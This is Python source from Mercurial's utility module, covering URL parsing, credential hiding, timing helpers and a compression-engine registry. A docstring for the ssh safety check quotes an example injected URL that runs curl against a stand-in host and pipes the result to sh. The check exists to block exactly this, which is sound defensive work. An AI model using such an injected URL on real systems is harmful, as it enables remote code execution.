2562 2567 for l in splitted:
2563 2568 if l[-1] == '\n':
2564 2569 yield l
2565 2570 else:
2566 2571 line = l
2567 2572 if not buf:
2568 2573 break
2569 2574 if line:
2570 2575 yield line
2571 2576
2572 2577 def iterfile(fp):
2573 2578 fastpath = True
2574 2579 if type(fp) is file:
2575 2580 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2576 2581 if fastpath:
2577 2582 return fp
2578 2583 else:
2579 2584 return _safeiterfile(fp)
2580 2585 else:
2581 2586 # PyPy and CPython 3 do not have the EINTR issue, so no workaround is needed.
2582 2587 def iterfile(fp):
2583 2588 return fp
2584 2589
2585 2590 def iterlines(iterator):
2586 2591 for chunk in iterator:
2587 2592 for line in chunk.splitlines():
2588 2593 yield line
2589 2594
2590 2595 def expandpath(path):
2591 2596 return os.path.expanduser(os.path.expandvars(path))
2592 2597
2593 2598 def hgcmd():
2594 2599 """Return the command used to execute current hg
2595 2600
2596 2601 This is different from hgexecutable() because on Windows we want
2597 2602 to avoid things like batch files that open new shell windows, so we
2598 2603 get either the python call or the current executable.
2599 2604 """
2600 2605 if mainfrozen():
2601 2606 if getattr(sys, 'frozen', None) == 'macosx_app':
2602 2607 # Env variable set by py2app
2603 2608 return [encoding.environ['EXECUTABLEPATH']]
2604 2609 else:
2605 2610 return [pycompat.sysexecutable]
2606 2611 return gethgcmd()
2607 2612
2608 2613 def rundetached(args, condfn):
2609 2614 """Execute the argument list in a detached process.
2610 2615
2611 2616 condfn is a callable which is called repeatedly and should return
2612 2617 True once the child process is known to have started successfully.
2613 2618 At this point, the child process PID is returned. If the child
2614 2619 process fails to start or finishes before condfn() evaluates to
2615 2620 True, return -1.
2616 2621 """
2617 2622 # Windows case is easier because the child process is either
2618 2623 # successfully starting and validating the condition or exiting
2619 2624 # on failure. We just poll on its PID. On Unix, if the child
2620 2625 # process fails to start, it will be left in a zombie state until
2621 2626 # the parent waits on it, which we cannot do since we expect a long
2622 2627 # running process on success. Instead we listen for SIGCHLD telling
2623 2628 # us our child process terminated.
2624 2629 terminated = set()
2625 2630 def handler(signum, frame):
2626 2631 terminated.add(os.wait())
2627 2632 prevhandler = None
2628 2633 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2629 2634 if SIGCHLD is not None:
2630 2635 prevhandler = signal.signal(SIGCHLD, handler)
2631 2636 try:
2632 2637 pid = spawndetached(args)
2633 2638 while not condfn():
2634 2639 if ((pid in terminated or not testpid(pid))
2635 2640 and not condfn()):
2636 2641 return -1
2637 2642 time.sleep(0.1)
2638 2643 return pid
2639 2644 finally:
2640 2645 if prevhandler is not None:
2641 2646 signal.signal(signal.SIGCHLD, prevhandler)
2642 2647
2643 2648 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2644 2649 """Return the result of interpolating items in the mapping into string s.
2645 2650
2646 2651 prefix is a single character string, or a two character string with
2647 2652 a backslash as the first character if the prefix needs to be escaped in
2648 2653 a regular expression.
2649 2654
2650 2655 fn is an optional function that will be applied to the replacement text
2651 2656 just before replacement.
2652 2657
2653 2658 escape_prefix is an optional flag that allows a doubled prefix to
2654 2659 serve as its own escape.
2655 2660 """
2656 2661 fn = fn or (lambda s: s)
2657 2662 patterns = '|'.join(mapping.keys())
2658 2663 if escape_prefix:
2659 2664 patterns += '|' + prefix
2660 2665 if len(prefix) > 1:
2661 2666 prefix_char = prefix[1:]
2662 2667 else:
2663 2668 prefix_char = prefix
2664 2669 mapping[prefix_char] = prefix_char
2665 2670 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2666 2671 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2667 2672
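# Worked examples (editor's addition) of the substitution above; with
# escape_prefix=True, a doubled prefix collapses to a literal one.
#
#   >>> interpolate(b'%', {b'foo': b'bar'}, b'say %foo')
#   'say bar'
#   >>> interpolate(br'\$', {b'foo': b'bar'}, b'$$foo costs $foo',
#   ...             escape_prefix=True)
#   '$foo costs bar'
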
2668 2673 def getport(port):
2669 2674 """Return the port for a given network service.
2670 2675
2671 2676 If port is an integer, it's returned as is. If it's a string, it's
2672 2677 looked up using socket.getservbyname(). If there's no matching
2673 2678 service, error.Abort is raised.
2674 2679 """
2675 2680 try:
2676 2681 return int(port)
2677 2682 except ValueError:
2678 2683 pass
2679 2684
2680 2685 try:
2681 2686 return socket.getservbyname(port)
2682 2687 except socket.error:
2683 2688 raise Abort(_("no port number associated with service '%s'") % port)
2684 2689
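# Worked examples (editor's addition); the name lookup consults the local
# services database, so results can vary by system.
#
#   >>> getport(8080)
#   8080
#   >>> getport(b'http')   # resolved via socket.getservbyname
#   80
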
2685 2690 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2686 2691 '0': False, 'no': False, 'false': False, 'off': False,
2687 2692 'never': False}
2688 2693
2689 2694 def parsebool(s):
2690 2695 """Parse s into a boolean.
2691 2696
2692 2697 If s is not a valid boolean, returns None.
2693 2698 """
2694 2699 return _booleans.get(s.lower(), None)
2695 2700
2696 2701 _hextochr = dict((a + b, chr(int(a + b, 16)))
2697 2702 for a in string.hexdigits for b in string.hexdigits)
2698 2703
2699 2704 class url(object):
2700 2705 r"""Reliable URL parser.
2701 2706
2702 2707 This parses URLs and provides attributes for the following
2703 2708 components:
2704 2709
2705 2710 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2706 2711
2707 2712 Missing components are set to None. The only exception is
2708 2713 fragment, which is set to '' if present but empty.
2709 2714
2710 2715 If parsefragment is False, fragment is included in query. If
2711 2716 parsequery is False, query is included in path. If both are
2712 2717 False, both fragment and query are included in path.
2713 2718
2714 2719 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2715 2720
2716 2721 Note that for backward compatibility reasons, bundle URLs do not
2717 2722 take host names. That means 'bundle://../' has a path of '../'.
2718 2723
2719 2724 Examples:
2720 2725
2721 2726 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2722 2727 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2723 2728 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2724 2729 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2725 2730 >>> url(b'file:///home/joe/repo')
2726 2731 <url scheme: 'file', path: '/home/joe/repo'>
2727 2732 >>> url(b'file:///c:/temp/foo/')
2728 2733 <url scheme: 'file', path: 'c:/temp/foo/'>
2729 2734 >>> url(b'bundle:foo')
2730 2735 <url scheme: 'bundle', path: 'foo'>
2731 2736 >>> url(b'bundle://../foo')
2732 2737 <url scheme: 'bundle', path: '../foo'>
2733 2738 >>> url(br'c:\foo\bar')
2734 2739 <url path: 'c:\\foo\\bar'>
2735 2740 >>> url(br'\\blah\blah\blah')
2736 2741 <url path: '\\\\blah\\blah\\blah'>
2737 2742 >>> url(br'\\blah\blah\blah#baz')
2738 2743 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2739 2744 >>> url(br'file:///C:\users\me')
2740 2745 <url scheme: 'file', path: 'C:\\users\\me'>
2741 2746
2742 2747 Authentication credentials:
2743 2748
2744 2749 >>> url(b'ssh://joe:xyz@x/repo')
2745 2750 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2746 2751 >>> url(b'ssh://joe@x/repo')
2747 2752 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2748 2753
2749 2754 Query strings and fragments:
2750 2755
2751 2756 >>> url(b'http://host/a?b#c')
2752 2757 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2753 2758 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2754 2759 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2755 2760
2756 2761 Empty path:
2757 2762
2758 2763 >>> url(b'')
2759 2764 <url path: ''>
2760 2765 >>> url(b'#a')
2761 2766 <url path: '', fragment: 'a'>
2762 2767 >>> url(b'http://host/')
2763 2768 <url scheme: 'http', host: 'host', path: ''>
2764 2769 >>> url(b'http://host/#a')
2765 2770 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2766 2771
2767 2772 Only scheme:
2768 2773
2769 2774 >>> url(b'http:')
2770 2775 <url scheme: 'http'>
2771 2776 """
2772 2777
2773 2778 _safechars = "!~*'()+"
2774 2779 _safepchars = "/!~*'()+:\\"
2775 2780 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2776 2781
2777 2782 def __init__(self, path, parsequery=True, parsefragment=True):
2778 2783 # We slowly chomp away at path until we have only the path left
2779 2784 self.scheme = self.user = self.passwd = self.host = None
2780 2785 self.port = self.path = self.query = self.fragment = None
2781 2786 self._localpath = True
2782 2787 self._hostport = ''
2783 2788 self._origpath = path
2784 2789
2785 2790 if parsefragment and '#' in path:
2786 2791 path, self.fragment = path.split('#', 1)
2787 2792
2788 2793 # special case for Windows drive letters and UNC paths
2789 2794 if hasdriveletter(path) or path.startswith('\\\\'):
2790 2795 self.path = path
2791 2796 return
2792 2797
2793 2798 # For compatibility reasons, we can't handle bundle paths as
2794 2799 # normal URLS
2795 2800 if path.startswith('bundle:'):
2796 2801 self.scheme = 'bundle'
2797 2802 path = path[7:]
2798 2803 if path.startswith('//'):
2799 2804 path = path[2:]
2800 2805 self.path = path
2801 2806 return
2802 2807
2803 2808 if self._matchscheme(path):
2804 2809 parts = path.split(':', 1)
2805 2810 if parts[0]:
2806 2811 self.scheme, path = parts
2807 2812 self._localpath = False
2808 2813
2809 2814 if not path:
2810 2815 path = None
2811 2816 if self._localpath:
2812 2817 self.path = ''
2813 2818 return
2814 2819 else:
2815 2820 if self._localpath:
2816 2821 self.path = path
2817 2822 return
2818 2823
2819 2824 if parsequery and '?' in path:
2820 2825 path, self.query = path.split('?', 1)
2821 2826 if not path:
2822 2827 path = None
2823 2828 if not self.query:
2824 2829 self.query = None
2825 2830
2826 2831 # // is required to specify a host/authority
2827 2832 if path and path.startswith('//'):
2828 2833 parts = path[2:].split('/', 1)
2829 2834 if len(parts) > 1:
2830 2835 self.host, path = parts
2831 2836 else:
2832 2837 self.host = parts[0]
2833 2838 path = None
2834 2839 if not self.host:
2835 2840 self.host = None
2836 2841 # path of file:///d is /d
2837 2842 # path of file:///d:/ is d:/, not /d:/
2838 2843 if path and not hasdriveletter(path):
2839 2844 path = '/' + path
2840 2845
2841 2846 if self.host and '@' in self.host:
2842 2847 self.user, self.host = self.host.rsplit('@', 1)
2843 2848 if ':' in self.user:
2844 2849 self.user, self.passwd = self.user.split(':', 1)
2845 2850 if not self.host:
2846 2851 self.host = None
2847 2852
2848 2853 # Don't split on colons in IPv6 addresses without ports
2849 2854 if (self.host and ':' in self.host and
2850 2855 not (self.host.startswith('[') and self.host.endswith(']'))):
2851 2856 self._hostport = self.host
2852 2857 self.host, self.port = self.host.rsplit(':', 1)
2853 2858 if not self.host:
2854 2859 self.host = None
2855 2860
2856 2861 if (self.host and self.scheme == 'file' and
2857 2862 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2858 2863 raise Abort(_('file:// URLs can only refer to localhost'))
2859 2864
2860 2865 self.path = path
2861 2866
2862 2867 # leave the query string escaped
2863 2868 for a in ('user', 'passwd', 'host', 'port',
2864 2869 'path', 'fragment'):
2865 2870 v = getattr(self, a)
2866 2871 if v is not None:
2867 2872 setattr(self, a, urlreq.unquote(v))
2868 2873
2869 2874 @encoding.strmethod
2870 2875 def __repr__(self):
2871 2876 attrs = []
2872 2877 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2873 2878 'query', 'fragment'):
2874 2879 v = getattr(self, a)
2875 2880 if v is not None:
2876 2881 attrs.append('%s: %r' % (a, v))
2877 2882 return '<url %s>' % ', '.join(attrs)
2878 2883
2879 2884 def __bytes__(self):
2880 2885 r"""Join the URL's components back into a URL string.
2881 2886
2882 2887 Examples:
2883 2888
2884 2889 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2885 2890 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2886 2891 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2887 2892 'http://user:pw@host:80/?foo=bar&baz=42'
2888 2893 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2889 2894 'http://user:pw@host:80/?foo=bar%3dbaz'
2890 2895 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2891 2896 'ssh://user:pw@[::1]:2200//home/joe#'
2892 2897 >>> bytes(url(b'http://localhost:80//'))
2893 2898 'http://localhost:80//'
2894 2899 >>> bytes(url(b'http://localhost:80/'))
2895 2900 'http://localhost:80/'
2896 2901 >>> bytes(url(b'http://localhost:80'))
2897 2902 'http://localhost:80/'
2898 2903 >>> bytes(url(b'bundle:foo'))
2899 2904 'bundle:foo'
2900 2905 >>> bytes(url(b'bundle://../foo'))
2901 2906 'bundle:../foo'
2902 2907 >>> bytes(url(b'path'))
2903 2908 'path'
2904 2909 >>> bytes(url(b'file:///tmp/foo/bar'))
2905 2910 'file:///tmp/foo/bar'
2906 2911 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2907 2912 'file:///c:/tmp/foo/bar'
2908 2913 >>> print(url(br'bundle:foo\bar'))
2909 2914 bundle:foo\bar
2910 2915 >>> print(url(br'file:///D:\data\hg'))
2911 2916 file:///D:\data\hg
2912 2917 """
2913 2918 if self._localpath:
2914 2919 s = self.path
2915 2920 if self.scheme == 'bundle':
2916 2921 s = 'bundle:' + s
2917 2922 if self.fragment:
2918 2923 s += '#' + self.fragment
2919 2924 return s
2920 2925
2921 2926 s = self.scheme + ':'
2922 2927 if self.user or self.passwd or self.host:
2923 2928 s += '//'
2924 2929 elif self.scheme and (not self.path or self.path.startswith('/')
2925 2930 or hasdriveletter(self.path)):
2926 2931 s += '//'
2927 2932 if hasdriveletter(self.path):
2928 2933 s += '/'
2929 2934 if self.user:
2930 2935 s += urlreq.quote(self.user, safe=self._safechars)
2931 2936 if self.passwd:
2932 2937 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2933 2938 if self.user or self.passwd:
2934 2939 s += '@'
2935 2940 if self.host:
2936 2941 if not (self.host.startswith('[') and self.host.endswith(']')):
2937 2942 s += urlreq.quote(self.host)
2938 2943 else:
2939 2944 s += self.host
2940 2945 if self.port:
2941 2946 s += ':' + urlreq.quote(self.port)
2942 2947 if self.host:
2943 2948 s += '/'
2944 2949 if self.path:
2945 2950 # TODO: similar to the query string, we should not unescape the
2946 2951 # path when we store it, the path might contain '%2f' = '/',
2947 2952 # which we should *not* escape.
2948 2953 s += urlreq.quote(self.path, safe=self._safepchars)
2949 2954 if self.query:
2950 2955 # we store the query in escaped form.
2951 2956 s += '?' + self.query
2952 2957 if self.fragment is not None:
2953 2958 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2954 2959 return s
2955 2960
2956 2961 __str__ = encoding.strmethod(__bytes__)
2957 2962
2958 2963 def authinfo(self):
2959 2964 user, passwd = self.user, self.passwd
2960 2965 try:
2961 2966 self.user, self.passwd = None, None
2962 2967 s = bytes(self)
2963 2968 finally:
2964 2969 self.user, self.passwd = user, passwd
2965 2970 if not self.user:
2966 2971 return (s, None)
2967 2972 # authinfo[1] is passed to urllib2 password manager, and its
2968 2973 # URIs must not contain credentials. The host is passed in the
2969 2974 # URIs list because Python < 2.4.3 uses only that to search for
2970 2975 # a password.
2971 2976 return (s, (None, (s, self.host),
2972 2977 self.user, self.passwd or ''))
2973 2978
2974 2979 def isabs(self):
2975 2980 if self.scheme and self.scheme != 'file':
2976 2981 return True # remote URL
2977 2982 if hasdriveletter(self.path):
2978 2983 return True # absolute for our purposes - can't be joined()
2979 2984 if self.path.startswith(br'\\'):
2980 2985 return True # Windows UNC path
2981 2986 if self.path.startswith('/'):
2982 2987 return True # POSIX-style
2983 2988 return False
2984 2989
2985 2990 def localpath(self):
2986 2991 if self.scheme == 'file' or self.scheme == 'bundle':
2987 2992 path = self.path or '/'
2988 2993 # For Windows, we need to promote hosts containing drive
2989 2994 # letters to paths with drive letters.
2990 2995 if hasdriveletter(self._hostport):
2991 2996 path = self._hostport + '/' + self.path
2992 2997 elif (self.host is not None and self.path
2993 2998 and not hasdriveletter(path)):
2994 2999 path = '/' + path
2995 3000 return path
2996 3001 return self._origpath
2997 3002
2998 3003 def islocal(self):
2999 3004 '''whether localpath will return something that posixfile can open'''
3000 3005 return (not self.scheme or self.scheme == 'file'
3001 3006 or self.scheme == 'bundle')
3002 3007
3003 3008 def hasscheme(path):
3004 3009 return bool(url(path).scheme)
3005 3010
3006 3011 def hasdriveletter(path):
3007 3012 return path and path[1:2] == ':' and path[0:1].isalpha()
3008 3013
3009 3014 def urllocalpath(path):
3010 3015 return url(path, parsequery=False, parsefragment=False).localpath()
3011 3016
3012 3017 def checksafessh(path):
3013 3018 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3014 3019
3015 3020 This is a sanity check for ssh urls. ssh will parse the first item as
3016 3021 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3017 3022 Let's prevent these potentially exploitable urls entirely and warn the
3018 3023 user.
3019 3024
3020 3025 Raises an error.Abort when the url is unsafe.
3021 3026 """
3022 3027 path = urlreq.unquote(path)
3023 3028 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3024 3029 raise error.Abort(_('potentially unsafe url: %r') %
3025 3030 (path,))
3026 3031
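# Illustration (editor's addition): a leading dash in the host position
# would otherwise be handed to ssh as a command line option.
#
#   >>> checksafessh(b'ssh://example.com/repo')         # fine, returns None
#   >>> checksafessh(b'ssh://-oProxyCommand=bad/path')  # raises error.Abort
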
3027 3032 def hidepassword(u):
3028 3033 '''hide user credential in a url string'''
3029 3034 u = url(u)
3030 3035 if u.passwd:
3031 3036 u.passwd = '***'
3032 3037 return bytes(u)
3033 3038
3034 3039 def removeauth(u):
3035 3040 '''remove all authentication information from a url string'''
3036 3041 u = url(u)
3037 3042 u.user = u.passwd = None
3038 3043 return bytes(u)
3039 3044
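# Worked examples (editor's addition), handy when sanitizing URLs for
# display or logging:
#
#   >>> hidepassword(b'http://joe:secret@example.com/repo')
#   'http://joe:***@example.com/repo'
#   >>> removeauth(b'http://joe:secret@example.com/repo')
#   'http://example.com/repo'
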
3040 3045 timecount = unitcountfn(
3041 3046 (1, 1e3, _('%.0f s')),
3042 3047 (100, 1, _('%.1f s')),
3043 3048 (10, 1, _('%.2f s')),
3044 3049 (1, 1, _('%.3f s')),
3045 3050 (100, 0.001, _('%.1f ms')),
3046 3051 (10, 0.001, _('%.2f ms')),
3047 3052 (1, 0.001, _('%.3f ms')),
3048 3053 (100, 0.000001, _('%.1f us')),
3049 3054 (10, 0.000001, _('%.2f us')),
3050 3055 (1, 0.000001, _('%.3f us')),
3051 3056 (100, 0.000000001, _('%.1f ns')),
3052 3057 (10, 0.000000001, _('%.2f ns')),
3053 3058 (1, 0.000000001, _('%.3f ns')),
3054 3059 )
3055 3060
3056 3061 _timenesting = [0]
3057 3062
3058 3063 def timed(func):
3059 3064 '''Report the execution time of a function call to stderr.
3060 3065
3061 3066 During development, use as a decorator when you need to measure
3062 3067 the cost of a function, e.g. as follows:
3063 3068
3064 3069 @util.timed
3065 3070 def foo(a, b, c):
3066 3071 pass
3067 3072 '''
3068 3073
3069 3074 def wrapper(*args, **kwargs):
3070 3075 start = timer()
3071 3076 indent = 2
3072 3077 _timenesting[0] += indent
3073 3078 try:
3074 3079 return func(*args, **kwargs)
3075 3080 finally:
3076 3081 elapsed = timer() - start
3077 3082 _timenesting[0] -= indent
3078 3083 stderr.write('%s%s: %s\n' %
3079 3084 (' ' * _timenesting[0], func.__name__,
3080 3085 timecount(elapsed)))
3081 3086 return wrapper
3082 3087
3083 3088 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3084 3089 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3085 3090
3086 3091 def sizetoint(s):
3087 3092 '''Convert a space specifier to a byte count.
3088 3093
3089 3094 >>> sizetoint(b'30')
3090 3095 30
3091 3096 >>> sizetoint(b'2.2kb')
3092 3097 2252
3093 3098 >>> sizetoint(b'6M')
3094 3099 6291456
3095 3100 '''
3096 3101 t = s.strip().lower()
3097 3102 try:
3098 3103 for k, u in _sizeunits:
3099 3104 if t.endswith(k):
3100 3105 return int(float(t[:-len(k)]) * u)
3101 3106 return int(t)
3102 3107 except ValueError:
3103 3108 raise error.ParseError(_("couldn't parse size: %s") % s)
3104 3109
3105 3110 class hooks(object):
3106 3111 '''A collection of hook functions that can be used to extend a
3107 3112 function's behavior. Hooks are called in lexicographic order,
3108 3113 based on the names of their sources.'''
3109 3114
3110 3115 def __init__(self):
3111 3116 self._hooks = []
3112 3117
3113 3118 def add(self, source, hook):
3114 3119 self._hooks.append((source, hook))
3115 3120
3116 3121 def __call__(self, *args):
3117 3122 self._hooks.sort(key=lambda x: x[0])
3118 3123 results = []
3119 3124 for source, hook in self._hooks:
3120 3125 results.append(hook(*args))
3121 3126 return results
3122 3127
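# A usage sketch (editor's addition): results come back ordered by source
# name, not by registration order.
#
#   >>> h = hooks()
#   >>> h.add(b'zzz-ext', lambda x: x + 1)
#   >>> h.add(b'aaa-ext', lambda x: x * 2)
#   >>> h(3)
#   [6, 4]
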
3123 3128 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3124 3129 '''Yields lines for a nicely formatted stacktrace.
3125 3130 Skips the 'skip' last entries, then returns the last 'depth' entries.
3126 3131 Each file+linenumber is formatted according to fileline.
3127 3132 Each line is formatted according to line.
3128 3133 If line is None, it yields:
3129 3134 length of longest filepath+line number,
3130 3135 filepath+linenumber,
3131 3136 function
3132 3137
3133 3138 Not to be used in production code, but very convenient while developing.
3134 3139 '''
3135 3140 entries = [(fileline % (fn, ln), func)
3136 3141 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3137 3142 ][-depth:]
3138 3143 if entries:
3139 3144 fnmax = max(len(entry[0]) for entry in entries)
3140 3145 for fnln, func in entries:
3141 3146 if line is None:
3142 3147 yield (fnmax, fnln, func)
3143 3148 else:
3144 3149 yield line % (fnmax, fnln, func)
3145 3150
3146 3151 def debugstacktrace(msg='stacktrace', skip=0,
3147 3152 f=stderr, otherf=stdout, depth=0):
3148 3153 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3149 3154 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3150 3155 By default it will flush stdout first.
3151 3156 It can be used everywhere and intentionally does not require an ui object.
3152 3157 Not to be used in production code, but very convenient while developing.
3153 3158 '''
3154 3159 if otherf:
3155 3160 otherf.flush()
3156 3161 f.write('%s at:\n' % msg.rstrip())
3157 3162 for line in getstackframes(skip + 1, depth=depth):
3158 3163 f.write(line)
3159 3164 f.flush()
3160 3165
3161 3166 class dirs(object):
3162 3167 '''a multiset of directory names from a dirstate or manifest'''
3163 3168
3164 3169 def __init__(self, map, skip=None):
3165 3170 self._dirs = {}
3166 3171 addpath = self.addpath
3167 3172 if safehasattr(map, 'iteritems') and skip is not None:
3168 3173 for f, s in map.iteritems():
3169 3174 if s[0] != skip:
3170 3175 addpath(f)
3171 3176 else:
3172 3177 for f in map:
3173 3178 addpath(f)
3174 3179
3175 3180 def addpath(self, path):
3176 3181 dirs = self._dirs
3177 3182 for base in finddirs(path):
3178 3183 if base in dirs:
3179 3184 dirs[base] += 1
3180 3185 return
3181 3186 dirs[base] = 1
3182 3187
3183 3188 def delpath(self, path):
3184 3189 dirs = self._dirs
3185 3190 for base in finddirs(path):
3186 3191 if dirs[base] > 1:
3187 3192 dirs[base] -= 1
3188 3193 return
3189 3194 del dirs[base]
3190 3195
3191 3196 def __iter__(self):
3192 3197 return iter(self._dirs)
3193 3198
3194 3199 def __contains__(self, d):
3195 3200 return d in self._dirs
3196 3201
3197 3202 if safehasattr(parsers, 'dirs'):
3198 3203 dirs = parsers.dirs
3199 3204
3200 3205 def finddirs(path):
3201 3206 pos = path.rfind('/')
3202 3207 while pos != -1:
3203 3208 yield path[:pos]
3204 3209 pos = path.rfind('/', 0, pos)
3205 3210
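# A usage sketch (editor's addition): dirs() counts how many paths live
# under each directory, so deleting one path keeps parents that are still
# referenced by another. The same holds for the C implementation above.
#
#   >>> d = dirs([b'a/b/c', b'a/d'])
#   >>> (b'a' in d, b'a/b' in d, b'a/b/c' in d)
#   (True, True, False)
#   >>> d.delpath(b'a/d')
#   >>> b'a' in d   # still referenced by 'a/b/c'
#   True
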
3206 3211 # compression code
3207 3212
3208 3213 SERVERROLE = 'server'
3209 3214 CLIENTROLE = 'client'
3210 3215
3211 3216 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3212 3217 (u'name', u'serverpriority',
3213 3218 u'clientpriority'))
3214 3219
3215 3220 class compressormanager(object):
3216 3221 """Holds registrations of various compression engines.
3217 3222
3218 3223 This class essentially abstracts the differences between compression
3219 3224 engines to allow new compression formats to be added easily, possibly from
3220 3225 extensions.
3221 3226
3222 3227 Compressors are registered against the global instance by calling its
3223 3228 ``register()`` method.
3224 3229 """
3225 3230 def __init__(self):
3226 3231 self._engines = {}
3227 3232 # Bundle spec human name to engine name.
3228 3233 self._bundlenames = {}
3229 3234 # Internal bundle identifier to engine name.
3230 3235 self._bundletypes = {}
3231 3236 # Revlog header to engine name.
3232 3237 self._revlogheaders = {}
3233 3238 # Wire proto identifier to engine name.
3234 3239 self._wiretypes = {}
3235 3240
3236 3241 def __getitem__(self, key):
3237 3242 return self._engines[key]
3238 3243
3239 3244 def __contains__(self, key):
3240 3245 return key in self._engines
3241 3246
3242 3247 def __iter__(self):
3243 3248 return iter(self._engines.keys())
3244 3249
    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # A bundle name of None means no external facing name is
            # declared, so only register the name when one is present.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle name isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return sorted(engines, key=getkey)

    def forwiretype(self, wiretype):
        """Obtain a compression engine registered to a wire proto identifier.

        Will raise KeyError if the wire type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

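# Example (illustrative): callers and extensions go through this global
# instance rather than creating their own manager. Once the built-in engines
# defined below are registered, lookups work by engine name or bundle name:
#
#   engine = compengines['zlib']
#   engine = compengines.forbundlename('gzip')   # same engine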
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

